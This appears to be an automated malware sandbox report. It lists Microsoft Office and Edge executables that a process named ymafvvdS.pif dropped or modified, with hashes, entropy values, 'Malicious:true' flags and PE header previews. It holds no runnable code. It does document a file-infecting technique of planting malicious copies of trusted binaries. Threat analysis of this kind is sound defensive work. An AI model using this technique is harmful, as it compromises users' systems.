                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.................................L............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1287680
                                                                                                                                                                                                                        Entropy (8bit):5.295148067762896
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:ZNmt0LDILi2yJWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:8LikqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:2DFBE8C9A5A7DAAF732FEB6E66DE8A3A
                                                                                                                                                                                                                        SHA1:F3A5EE35B542BE029D95BDAD2F3EE1A75D7C6E49
                                                                                                                                                                                                                        SHA-256:C06626191BAE81B60FA8717969D08D7994BBF838508B4F33B01390432E46283F
                                                                                                                                                                                                                        SHA-512:DF87A9742585CFDF8FD82ECADDE49B47F3153B66D4B156D298962049AE5785573CA81A61A547676217D92BEF57B6D674DBF049FF54CB8467326A8E14625A5C7B
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..................................4........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1343488
                                                                                                                                                                                                                        Entropy (8bit):5.227684907524971
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:VjuozvMGNUbT8WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4R:NfQqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:5770BEBF38267AF647211DF3C51D781E
                                                                                                                                                                                                                        SHA1:298A3E5E39BDC1E7DB688E93A3C73BF2910877B5
                                                                                                                                                                                                                        SHA-256:89B6E2BFE44503189272D311EEB06AFAB02FA629885023F2B01E199D6B6EB67E
                                                                                                                                                                                                                        SHA-512:97C05F02A46CC66C0AA5D85DFE2B43C684F2ED7B0D45357A19CE4E53EF76EFEE466C74D4AD4A98F245FA300743B8295B0EECCEEB10D0EE0D948CDC934EF8E1F4
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@....................................6..... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1496064
                                                                                                                                                                                                                        Entropy (8bit):5.57031954499461
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:uWmt0LDdOUO42ZdoruI4kxBgGOzWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHE:ubUO42y/EKqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:9E74F7AF73B0A39717595A334757FEF7
                                                                                                                                                                                                                        SHA1:761CC934EC8D3A1D6638CE211229980BF2DBAF01
                                                                                                                                                                                                                        SHA-256:03CA11BC35D299FDD06800B630950AEB20F4BDAAF74E0627E687B7F1884B63AB
                                                                                                                                                                                                                        SHA-512:8A2CC602BF6D0FD2B58F6ABE2EFF30B08F1310D44A5DE1992D374A6135E773A663786EC8BC0C0725F4652F9EFA1646C58BE52553144087E304F0C5C89B68DEC6
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@.......................... ......t............ ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):52712960
                                                                                                                                                                                                                        Entropy (8bit):7.961781850126838
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1572864:kKjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:HicZmsR3Lo/cnLe
                                                                                                                                                                                                                        MD5:54715B051FAA31E9E953B5BB68629E4A
                                                                                                                                                                                                                        SHA1:E25C1575EE712B71C3EC53CB27405F9DF749803A
                                                                                                                                                                                                                        SHA-256:3255CE0E15605129CDBCA42C7D53D3B1EAD1FDA4B117273516205DD238A6E86B
                                                                                                                                                                                                                        SHA-512:9050C44349FDD82CFED6778500D957A29161F3164D7B8652CD2CE189B8BFDF342AD3F319825FFDAFF7FAC6F04CC1D7B0A3A2C0DE3293A9B5EDE1E3BF05E4E7E3
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.....e&%..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4993536
                                                                                                                                                                                                                        Entropy (8bit):6.809235027242866
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:98304:BlkkCqyDEY7+o3OBvfGVY+40yaHyS+9s/pLHTthF3:3kkCqaE68eV+0yAE6LHTPF3
                                                                                                                                                                                                                        MD5:0EA3838F4AAFC115DB0D59B8BF9A7C97
                                                                                                                                                                                                                        SHA1:2605550B304B1267D5AAE77DED213573BF90CE41
                                                                                                                                                                                                                        SHA-256:AD13C7214814B6FB9738A836683FD6287C1E63F837AEB82DE90123708C839AA9
                                                                                                                                                                                                                        SHA-512:ED19CDF5E4DC9B7B3EB4A72D5DDE626EB9593821B2DD8FB030250B88185BD7DE591C32744A5D73C2E9520306AF57CE5D7C47412E4667DB21247AEBEE83200032
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ..*..Z........%......`+...@..........................pL......BL......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text.....*.......*................. ..`.rdata........+.......*.............@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1168384
                                                                                                                                                                                                                        Entropy (8bit):5.03600894040924
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:pWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:kqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:5D87086611CEF9DC221CEA2BAD088AC5
                                                                                                                                                                                                                        SHA1:9327AE493871D4E25391CED7B49DB4DCC2BA42E6
                                                                                                                                                                                                                        SHA-256:7D4E06A9AF155648F276284C6DA5B101C8F273AFFEB17BD44A40E017565870EC
                                                                                                                                                                                                                        SHA-512:A158B2EC23014A28BAF292639755DDF0266C7D1DB3D00D786495147605A77C9DE746DD5F5DE1C5D5DB9EA861920DF24DC1E26BACC7CAF478844EA0413E4619C9
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...........I.....................................................................%...........Rich...........PE..L....[.d............... .F...P......`?.......`....@..................................b..................................................$...........................P}..8....................i......`d..@............`......4o.......................text....E.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....c2r.....................................rsrc...$...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1522688
                                                                                                                                                                                                                        Entropy (8bit):5.322977763051578
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:5VwACThwSSn2dR1Ntl8WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:5yAAWSS2H1hqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:2E48CA582AA1AC610D8E1D6F7CA5BB5F
                                                                                                                                                                                                                        SHA1:F69FF192FFE0B94C65AD20C1FF5A25AAF7104665
                                                                                                                                                                                                                        SHA-256:17771E5ADF3C51C19964E8EC4927462B8692522041A4677EA1E38886211E936E
                                                                                                                                                                                                                        SHA-512:92C519E7A6406430ADF35AB69E98CF54392451355DB062DC995ECF4FA69255B5F3ACEC18425E7A4A89B7358DA286C721839992B5D667A99AC15FE5D2D02D1CFD
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.@.f.@.f.@...@.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@.f.@.d.@...A.f.@...ASf.@..z@.f.@.f.@.f.@...A.f.@Rich.f.@................PE..L......e............... .........................@.................................-...................................................,T..............................8...................Hj..........@...................D...`....................text...u........................... ..`.rdata..0...........................@..@.data...............................@....c2r.................d...................rsrc...,T.......V...f..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1293824
                                                                                                                                                                                                                        Entropy (8bit):5.207352425446388
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:wgd1aFWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:X6IqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:25F4A973057F8FFED81777C26A529198
                                                                                                                                                                                                                        SHA1:217A4553BF785904865F452259839634883D3D64
                                                                                                                                                                                                                        SHA-256:AE7AD73F1976BD4F5FF6C8AE43F163C621AEDEEE09145C07D5F33A2D7FEBBB30
                                                                                                                                                                                                                        SHA-512:BA75A479CAC3CF1A6C5E6D822F99E99C5CC0C283B675EBA13DF5C8B5FBFFD153F1B3BDDAD1C5AC8A01C06A69BEC90736CF5A1F073422BCB0626F5D68900E3303
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^.U.^.U.^.U.&rU.^.U.$.T.^.U.$.T.^.U.$.T.^.U2,.T.^.U2,.T.^.U.^.U.\.U.$.T.^.U.$.T.^.U.$.T.^.U.$.U.^.U.^vU.^.U.$.T.^.URich.^.U........................PE..L......e............... ............&q............@.........................................................................p..,.......`...........................(...8...............................@............................................text............................... ..`.rdata..|o.......p..................@..@.data....T.......R..................@....c2r....T....p.......L...................rsrc...`............N..............@..@.reloc...p.......`...^..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1147904
                                                                                                                                                                                                                        Entropy (8bit):5.031426397762276
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:207WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:IqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:1C82A3A8F7A82CEB70AC7803C28A0CE7
                                                                                                                                                                                                                        SHA1:832F879E1546681C9086BCB31205D5AEC373860C
                                                                                                                                                                                                                        SHA-256:940119BFD907B43E8DFE077898D37748CD651AB1F35ED03808CEEEA2DF59C9BE
                                                                                                                                                                                                                        SHA-512:24300B496D226D7CC1D5C6AC67991B25E29B234B955825BE4AED9CB5ED6D936097008D444E8992CE1122682AC0029AF8A2DB8C32CA850385D87D8F15538814AD
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T{..T{..T{..].!.D{..4...P{..4...M{..4...X{..4...Q{.....Q{..T{..0{..1...W{..1...S{..1.M.U{..1...U{..RichT{..........................PE..L....[.d............... ."...(......x........@....@..........................................................................I.......p...............................R..8............................A..@............@..T....H..`....................text...? .......".................. ..`.rdata..(....@.......&..............@..@.data...<....`.......<..............@....rsrc........p.......>..............@..@.reloc...P.......@...D..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1418752
                                                                                                                                                                                                                        Entropy (8bit):5.389634412130164
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:/jyposHHrKuZtPvh3FxWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:rAZHHrpZF/8qYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:E22B24BE7711C109DCDD4595DEF82950
                                                                                                                                                                                                                        SHA1:3B1CA67A49447B273A04AA092496AD2C9296E93C
                                                                                                                                                                                                                        SHA-256:51D5DAC9EC7295AF19AFFD435F840984379973D5A6BAB1B04F95DB9CE72AB6CB
                                                                                                                                                                                                                        SHA-512:652028B785015A89FD6210F7C8991C8F6465939012FCDE607137EC4657D13DB41EF3C244D9AEF8FCF9F7BDABF33C7BDEBC4799D91540951F1EE8DBDAFD58E0BD
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!.e...e...e.......n..............I.......w.......p.......d.......r.......n...e...........{.......d...e.F.d.......d...Riche...........................PE..L....;.d............... .....X......q........0....@.................................. ..........................................x.... ...a..............................8..............................@............0..p.......`....................text............................... ..`.rdata......0......................@..@.data....,..........................@....rsrc....a... ...b..................@..@.reloc...p.......`...F..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):53721600
                                                                                                                                                                                                                        Entropy (8bit):6.543154338139482
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1572864:pNVpTyR96CwKImp81ujlSHFsQ4adtZp20wfP+9HgoZRZa:pQ9lw68HSq
                                                                                                                                                                                                                        MD5:C7E29AD009BA52C2A28775EBAE2CA9C6
                                                                                                                                                                                                                        SHA1:224295C5516195E92EA723B07A58B8E9620B1848
                                                                                                                                                                                                                        SHA-256:ADFD39250D5356A283423ABD26DC81755C67C5165D53EDC1CA2A784FE0109288
                                                                                                                                                                                                                        SHA-512:79D8E419DF3E3141362DBA9727438BBB44F99C583A1D4EEE89D6A6B00F9365B74C65F952559B2534B5823F27CA9B6F6CC2D82E68D76F9644796D3ACD7254CC7D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......X.mj.r.9.r.9.r.9...9.r.9|..8.r.9|..8;r.9|..8.r.9|..8.r.9...8.r.9...8.r.9...8.r.9.r.9Gm.9y..8.r.9y..8.r.9y..8.o.9y..8.r.9y..9.r.9.r.9.r.9y..8.r.9Rich.r.9........PE..L......e..........".... .._.........y........@f...@.......................... 5.......3.................................[.......h......$DW.........................,q..8...................(.q...... `.@.............`.....d........................text...,._......._................. ..`.rdata...bM...`..dM..._.............@..@.data................\..............@....detourc.............p..............@..@.c2r.....................................rsrc...$DW.....FW.................@..@.reloc....$.. ....#.................@...........................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):40811520
                                                                                                                                                                                                                        Entropy (8bit):6.461239223220475
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:786432:HbuMdv8TOUI/JgcnYblPv+msZPH53u5LBsk/Q4YbFuceo4h5ay3I5D:HyM8TOtIlPv+msZPH1u5WkID5uceo4qR
                                                                                                                                                                                                                        MD5:3F0F3FA244E0C3C10DCE10334996E2FE
                                                                                                                                                                                                                        SHA1:1BB5A21FD657BF930C5C27824DC90A02F7505406
                                                                                                                                                                                                                        SHA-256:6DC9CBA7AA66895CC0365230156164D4ECC8E75B4201F2A4B7389874B6A863B9
                                                                                                                                                                                                                        SHA-512:6B1331927B5424FDAC783570EAC4A3353A3161F3A555FE6F0EE411A37DC60C0C0B3BB3CE51BEDD599D377B3053BFC8A133D06AAF2018FB3C192A1F48A5902B08
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........j............sI.....q......q......q......q.....Jy.....Jy.....Jy.............q......q......q......q......q%.....M.....q.....Rich....................PE..L......e............... ............h.......`....@...........................o.....2.n.............................4...^....P..T....`...]>.............................8........................... 5..@............ ..l............................text...P........................... ..`.rdata..8.;.. ....;.................@..@.data....<.......0..................@....detourc.....0......................@..@.c2r....|....P...........................rsrc....]>..`...^>.................@..@.reloc...P....S..@...|S.............@...................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1657344
                                                                                                                                                                                                                        Entropy (8bit):5.628255544284414
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:ml8DMeflpnIOvYUrqYdTt/hXV0cfQ9Y4:mqDD9pnIOFqQTt/hXV0cD
                                                                                                                                                                                                                        MD5:FA6E75CF2D36F88FCAED5D8534F49E4D
                                                                                                                                                                                                                        SHA1:906C0168CC82F0F129750A48989DB94FD7F79503
                                                                                                                                                                                                                        SHA-256:51F5A5BA5C68AB21FFF79E35D8B2F7823348F9D720A4EA4F306D88F0C9B6F771
                                                                                                                                                                                                                        SHA-512:88734CAD41ABBABE5D8A4D3CC8A1A1A9CB1AE703F6B260892839D6F7742A7C162A389EB4E1313B6F6E0514213E635F619119C14E690391BFBB610AB17972A8B7
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@......................................... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4364800
                                                                                                                                                                                                                        Entropy (8bit):6.745571171794416
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:3B1sstqMHiq8kBfK9a+cOVE/TqEpEepdkRqqUu9wg6KFYso8l8EqqQTt/hXV0cD:LHzorVmr2gkRpdJYolQTthF3
                                                                                                                                                                                                                        MD5:2F9CB8D5850066045B3D3B4196FABD67
                                                                                                                                                                                                                        SHA1:F670442CE414DA3E3006496ED46FC025001AF44A
                                                                                                                                                                                                                        SHA-256:10C549E582BF05DDE90C18C6205EFBD886C494F4D1EE8524CC522D1CE1156764
                                                                                                                                                                                                                        SHA-512:B522C9AB634F6719AE2FAECA7ED87D47C99004176B7DE7C2C1B00B58A135B89F32BD3D0B91634D753783615D0007A9E343FE5FE306E076720217197105D22800
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD......B... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1238528
                                                                                                                                                                                                                        Entropy (8bit):5.138431932912126
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:T3w1uVdSEjaWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4v:TEyT1qYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:9E34CAD530E746649D99A4FFE6ED77EE
                                                                                                                                                                                                                        SHA1:BAC546E46809CD7F4EE9E97354B6890B8856136B
                                                                                                                                                                                                                        SHA-256:BB3849A6FE002E37E935492DEFF9F6F3AD32976AB6B2D3AE42F248A881D54FC2
                                                                                                                                                                                                                        SHA-512:ADB8E223DE25DA72D929373C2651B80A7DF9186D02EA8F28474C4A5F3AF8FA9E629153C2C5653D584F1CFD0AD54F9F0DF2CE8545B22FDF0AB41AC310AD77DA36
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P......+..... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2354176
                                                                                                                                                                                                                        Entropy (8bit):7.049967410338301
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:ahDdVrQ95RW0YEHyWQXE/09Val0GKDmg27RnWGj:ahHYW+HyWKVD527BWG
                                                                                                                                                                                                                        MD5:6A2E9C13C2A578F9FC128F26D48FC3D7
                                                                                                                                                                                                                        SHA1:B437215D27CC238D9F5341E8D7D073F0DAF03867
                                                                                                                                                                                                                        SHA-256:841C09112EA918977771E7DA68D4319AB13AF2B99AEFECA99D939D1B47077941
                                                                                                                                                                                                                        SHA-512:429F6E4660BE669774EACB46191E088EEA9A612AECEE48851D99B37CDBCD1B1558FC710C3D641558C40EA02DF8037B7A42A1CFC12924EB3C03C3D9E6BB93AA3A
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
